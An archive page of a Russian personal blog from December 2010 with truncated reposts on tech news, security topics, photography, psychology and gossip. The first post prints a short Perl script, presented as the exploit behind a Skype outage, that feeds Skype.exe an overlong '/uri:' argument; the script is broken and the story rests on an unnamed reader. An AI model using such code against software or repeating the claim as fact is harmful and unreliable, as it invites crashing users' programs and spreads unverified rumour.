Пятница, 26.04.2024, 04:59
Мой персональный сайт Добрым людям smart & sober

Главная Регистрация Вход
Приветствую Вас, Гость · RSS
Калькулятор


Меню сайта
Календарь
«  Декабрь 2010  »
ПнВтСрЧтПтСбВс
  12345
6789101112
13141516171819
20212223242526
2728293031


Форма входа


Архив записей
Мини-чат


Категории раздела


Наш опрос
В чем заключается ваш смысл жизни
Всего ответов: 154
 
Главная » 2010 » Декабрь » 28

Причиной недавнего падения сети Skype стали исследования русских взломщиков, сообщил нам один из читателей.

В ходе поиска локального переполнения буфера была обнаружена возможность послать длинную строку на сервер и переполнить его буфер, в результате чего он падает. Его место занимает другой сервер из P2P-сети, на нем также возникает ошибка и так далее. В результате за несколько часов вся сеть Skype пришла к отказу в обслуживании и команда разработчиков была вынуждена отключить аутентификацию.

Код эксплоита выглядит так:

#!/usr/bin/perl 
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!

for ($i=256; $i>xCCCCC; $i=$i+256)
{
$eot='AAAA' x $i;
call_sp();
}
exit;

sub call_sp()
{
$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
system("$str");
}
... Читать дальше »
Просмотров: 668 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

У активных пользователей интернета онлайновые радиостанции давно заменили обычные радиоприемники. Их преимущество над радиоволнами неоспоримо – огромный выбор музыки на любой вкус, высокое качество, отсутствие рекламы. Последнее обстоятельство лично для меня определяющее. По-моему, современное радиовещание убъют именно абсолютно неумеренные дозы рекламы. Шутка ли, современные так называемые "музыкальные радиостанции" дошли до проигрывания 5-6 песен в час – остальное время занимает болтовня, новости, погода и реклама, реклама, реклама…

Но это я отвлекся. Речь сегодня пойдет о том, как записать музыку с онлайнового радио на свой жесткий диск. В этом нам поможет умная программа streamWriter. Программа имеет две версии – установочный файл и портабельнsq вариант в виде zip-архива. Сразу после первого запуска программы открывается пошаговый мастер, который помогает сделать необходимые настройки. После этого появляе ... Читать дальше »

Просмотров: 720 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Не секрет, что когда люди уже отчаялись самостоятельно решить свои проблемы, они обращаются к специалистам. То есть к психологам. Касается это и поисков счастья, так как зачастую именно отсутствие этого ощущения лишает нашу жизнь красок.

Карл Юнг один из величайших психологов, основоположник одного из направлений глубинной психологии, поделился своими мыслями на этот счет в интервью с журналистом Гордоном Янгом в 1960 году.

Итак, 5 составляющих, которые по его мнению являются основой для человеческого счастья:

  1. Хорошее физическое и психическое здоровье.
  2. Хорошие личные и интимные отношения (семья, друзья, брак).
  3. Способность к восприятию красоты в природе и искусстве.
  4. Умеренный образ жизни и удовлетворения от работы.
  5. Философская или религиозная точка зрения, которая помогает успешно справляться с превратностями судьбы.

Также он добавил, что иногда наличие всех 5 факторов не является гарантией ощущения счас ... Читать дальше »

Просмотров: 765 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Сейчас трудно найти человека, у которого не было бы фотокамеры — она есть и в виде отдельного, порой крутого девайса, и встроена в мобильный телефон. Однако не многие из нас могут похвастаться тем, кто используют имеющуюся фотокамеру на все сто. Но ничего, мы поможем это исправить.

Фотокамера это не просто устройство, позволяющее красиво фотографировать свою кису, это мощный инструмент для познания мира. Наверняка ежедневно вы десятки раз замечали вокруг себя множество интересных вещей, отмечали про себя "хмм, занятно" и проходили дальше. Это не совсем правильно — выжимайте из интересного вокруг максимум, вдохновляйтесь сами и вдохновляйте других. И фотокамера — ваш незаменимый помощник.

  • Приучите себя простому правилу: увидели что-то интересное — сфотографируйте это. Неважно что это будет — красивое дерево, занятная жизненная ситуация на улице, коллега, спящий лицом на клавиатуре, необычный момент в поезде или путешествии. Поймите — другого случая за ... Читать дальше »
Просмотров: 1081 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Как показывает инцидент, о котором мы сообщали на прошлой неделе, система Интернет-маршрутизации не так безопасна, как мы бы того желали. Но на самом ли деле все так плохо?

Давайте для начала разберемся, что собственно представляет из себя интернет маршрутизация. Маршрутизация основана на автономных системах (AS), которые обмениваются префиксами (диапазоны IP адресов) используя Border Gateway Protocol (BGP). Автономные системы это первые и главные интернет провайдеры (ISP). Но некоторые организации подключены к двум или более провайдерам одновременно. IP адреса, которые ISP выдают своим клиентам, сгруппированны в относительно небольшое число префиксов, покрывающих большие адресные блоки. Эти префиксы "анонсируются" или "рекламируются" через BGP в AS. Префиксы идут от AS к AS, так что в конце концов весь Интернет знает, куда отсылать пакеты с данным адресом назначения.

Понятие BGP (Border Gateway Protoc ... Читать дальше »

Просмотров: 804 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Наталья Малышева

Вопрос приема оплаты за услуги или товар встает перед каждым, кто собирается создать свой бизнес в инете. При кажущейся сложности наладить систему для приема платежей несложно, причем можно не ограничивать себя одними лишь электронными деньгами, а принимать к оплате и обычные кредитные карточки. Важным этапом является выбор партнеров для сотрудничества, опытом работы с которым я и спешу поделиться.

Итак, я — менеджер финансового звена компании Telecomax ltd. Компания занимается покупкой и продажей голосового трафика, написанием программного обеспечения для работы с голосом, интеграцией и объединением различных голосовых сетей и провайдеров, как традиционных, так и Skype/Google Talk. Особым спросом пользуются сим-карты альтернативного роуминга GSM-travel, Java-приложение для мобильного телефона, магазин телефонных номеров со всех континентов, виртуальный офис. Специфика тут в том, что, приобретая услугу, кл ... Читать дальше »

Просмотров: 909 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

С тех пор, как злой компьютер из War Games практический привел мир к глобальной катастрофе, а Терминатор вернулся из будущего, чтобы всех нас уничтожить, кибернетический мир наводнен теориями заговора, повествующими о том, что машины постепенно завладеют миром. Одновременно волнующим и ужасающим является тот факт, что когда-нибудь мы все-таки научим машины думать за нас. С начала 80-х, когда делались предсказания, во что могут эволюционировать "суперкомпьютеры", прошло не мало времени. Теперь, когда то самое будущее настало, суперкомпьютер – это прежде всего Интернет, огромное количество объединенных пользовательских компьютеров и серверов. Кажется, что такое объединение не опаснее игры в онлайн Mahjong. Однако на самом деле оно таит в себе гораздо большую угрозу.

Интернет во многом стал неотъемлемой частью нашей жизни и многие уже просто не могут представить без него своей жизни. И пока большинство из нас предпочитает игнорировать куки, персональную рекламу или х ... Читать дальше »

Просмотров: 741 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

У каждого из команды ][ - свои предпочтения по части софта и утилит для пентеста. Посовещавшись, выяснилось, что выбор так разнится, что можно составить настоящий джентльменский набор из проверенных программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на темы. Поиск уязвимостей - это определенно одна из интереснейших тем.

Подставив кавычку в нужном месте - и нашел возможность для инъекции? Проснись! Давно прошли времена, когда пионерские способы помогали найти ошибки даже в серьезных проектах. Поиск уязвимых мест стал намного более изощренным, как и техники для успешной эксплуатации уязвимостей. Если раньше худо-бедно можно было все реализовать вручную, то теперь без вспомогательных инструментов не обойтись. Последние не только выполнят муторную работу за тебя, но и подскажут, как можно воспользоваться багой, а в некоторых случаях - даже автоматизируют процесс эксплуатации. Итак, приступим?

Nikto

Сайт: ... Читать дальше »

Просмотров: 1053 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Тарас «oxdef» Иващенко, Дмитрий «Invent» Сидоров

HTML5 — будущий стандарт языка разметки Интернет. Пока он находится в стадии черновика, но все больше и больше его возможностей реализуются в популярных веб-браузерах. Но как это обычно бывает, новые технологии несут в себе и новые опасности, которые могут быть успешно проэксплоитованы.

HTML5: краткое резюме

Многие, вероятно, уже наслышаны про противостояние кодеков для технологии встраивания видеороликов на страницах. С помощью тега <video> предполагается если не заменить, то как минимум составить серьезную конкуренцию Adobe Flash. Заводя разговор о HTML5, часто вспоминают именно это нововведение. Еще бы: такие гиганты видеохостинга как Youtube и Vimeo уже реализовали поддержку новой технологии. А мобильные продукты от Apple, в которых официальной поддержки Flash'а не было и, скорее всего, не будет, уже активно ее используют. Так что потоковое видео, вставленное в с ... Читать дальше »

Просмотров: 939 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Олег Игоревич

Как известно человек стал человеком благодаря труду. Но ведь на этот труд его толкает бесконечная лень. Когда-то давно, когда обезьяне надоело лазить на дерево за бананами, она взяла в руки палку и начала сбивать их с земли. Вроде прогресс, а двигатель - лень!

Впрочем речь идет не об обезьянах, а о той самой лени. Чтобы очеловечиться еще чуть-чуть, ленивым открывателям дверей я предлагаю собрать небольшой девайсик, который можно установить поверх дверного замка, а ключик от него будет - обыкновенный flash-накопитель, который можно сделать универсальным на все замки в квартире, а можно разработать целую политику безопасности с системой разграничения доступа (например ключик от бара будет только у вас :)).

Для воплощения данной идеи нам необходима сама флешка, пара светодиодов (я взял по стандарту зеленый и красный), пара метров удлинительного кабеля usb от ПК до замка, сервомоторчик и сердцем всей нашей системе ... Читать дальше »

Просмотров: 742 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Александр Эккерт

Сегодня мы поговорим о том, о чем вспоминают обычно в последнюю очередь — о безопасности твоих приложений. Ведь ты же не хочешь читать о том, что в творении рук твоих — супернавороченной программе — нашли уязвимости, которые поставят под угрозу работу каких-нибудь важных организаций? Ладно бы, если это простая фирма, а если банк? Или атомная электростанция?

Введение

Увы и ах — технологии .NET прочно вошли в нашу жизнь, и на сегодняшний день разработчики C# пользуются неслыханной популярностью на рынке труда. Легкий в изучении и освоении язык дал программисту неслыханную свободу действий и при этом позволил расширить круг тех лиц, которые стали гордо именовать себя "программистами". Столь низкий "порог вхождения в специальность" обусловил тот факт, что начинающие (и не очень) программисты не стали уделять должного внимания безопасности своего кода. Но обо всем по порядку.

У общеязыковой и ... Читать дальше »

Просмотров: 747 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Компания Microsoft в срочном порядке начала разработку патча для 0-day эксплоита, под влиянием которого оказался браузер Internet Explorer.

В Security Advisory 2488013 Microsoft предупредила пользователей о новой уязвимости в Internet Explorer. В своем TechNet блоге Microsoft сообщила: "Эта уязвимость влияет на все версии IE. Использование данной уязвимости может привести к удаленному исполнению несанкционированного кода внутри процесса iexplore.exe".

Microsoft сказала, что открытый проект, посвященный информационной безопасности и занимающийся созданием и тестированием эксплоитов, Metasploit, выпустил эксплоит для уязвимости используя известные техники обхода ASLR (Address Space Layout Randomization) и обхода DEP (Data Execution Prevention), которые используются для предотвращения выполнения вредоносного кода в IE.

IE использует библиотеки динамической компоновки (DLL) для рендеринга определенного типа ко ... Читать дальше »

Просмотров: 662 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Британский хакер взломал код доступа в сверхсекретную американскую военную лабораторию, вызвав панику в рядах ученых и военных. Американцам показалось, что ядерной лаборатории грозит террористический акт.

18-летнего Джозефа Макэлроя, который в сети был известен под ником Deathserv, подвела щедрость. Ему удалось незамеченным проникнуть сквозь электронные системы безопасности и сгенерировать пароль доступа, который позволил ему незаметно хозяйничать в компьютерах лаборатории. Американским военным из Fermi National Accelerator Laboratory (штат Иллинойс) повезло в том смысле, что юному Макэлрою от лаборатории не нужны были никакие секретные данные: ее мощной быстрой сетью он пользовался только для того, чтобы качать фильмы и музыкальные файлы MP3 из интернета.
Однако он не только сам пользовался этим паролем, но и раздал его всем своим друзьям, и те стали качать столько файлов, что перегрузку сети заметили рядовые работники лаборатории. Только тогда на это ... Читать дальше »
Просмотров: 700 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Компания Microsoft начала расследование по факту появления в интернете генераторов ключей активации для ряда своих продуктов. С помощью этих программ можно сгенерировать любое количество ключей для активации продуктов Microsoft. Информация о новом генераторе ключей впервые появились на сайте Neowin, однако вскоре была с него удалена.
Как сообщает eWeek со ссылкой на руководителя Neowin под псевдонимом Creamhackered, генератор ключей имеет китайское происхождение и позволяет генерировать коды активации для операционных систем Windows XP и Windows Server 2003, а также офисного пакета Office XP. Ключи генерируются как для розничных версий программных продуктов, так и для пакетов, продающихся на условиях volume licensing.
Стоит отметить, что программы для обхода системы активации Windows появлялись и ранее. В Microsoft хотя и расследуют случай с появлением нового генератора отмечают, что у специалистов компании есть возможность отличить настоящие ключи от пира ... Читать дальше »
Просмотров: 750 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Во второй половине 2004 активность израильских хакеров снизилась. Об этом свидетельствуют данные исследования, проведенного международной компанией по защите информации «Симантек».
«Симантек» оценивает хакерскую активность только в тех странах, где к интернету подключены не менее 1 млн пользователей. Рейтинг страны определяется в соответствие с тем, сколько хакерских атак на каждые 10 тысяч пользователей проводится с ее территории. В первой половине 2004 Израиль занимал 3 место (811 хакерских атак на 10 тысяч пользователей), а во второй половине опустился на 5 место – 730 атак.
По данным на конец 2004 малопочетное первое место занимает Панама, Израиль опережают также Гонконг, Макао и Катар. Места в первой десятке после Израиля занимают Турция, Босния и Герцеговина, Канада, Люксембург и Испания. lenta.co.il
Просмотров: 691 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Адвокаты Эштона Катчера угрожают владельцам одной из компаний по развлечениям для взрослых судебным иском за то, что компания использовала имя актера в одном из домашних видео для того, чтобы повысить на него спрос.
Как утверждают источники, руководство компании заявило о своем намерении выпустить на DVD домашнее видео эротического характера с участием Бритни Джонс. По словам девушки, она занималась сексом с актером, и это было просто великолепно.
«Поклонники Эштона, несомненно, будут рады возможности посмотреть на то, какой удовольствие испытал их кумир» - заявила Бритни.
В письме адвоката счастливо женатого актера руководству компании говорится , что он уверен, что имя его подопечного упоминается исключительно в целях повышения спроса на данное видео и на самом деле Катчер не фигурирует в нем. Роберт Д. Оффер заявил, что если имя Катчера не уберут с коробки с видео, он подаст иск и компания будет вынуждена возместить актеру ущерб в полном объеме. len ... Читать дальше »
Просмотров: 722 | Добавил: Breger | Дата: 28.12.2010 | Комментарии (0)

Copyright MyCorp © 2024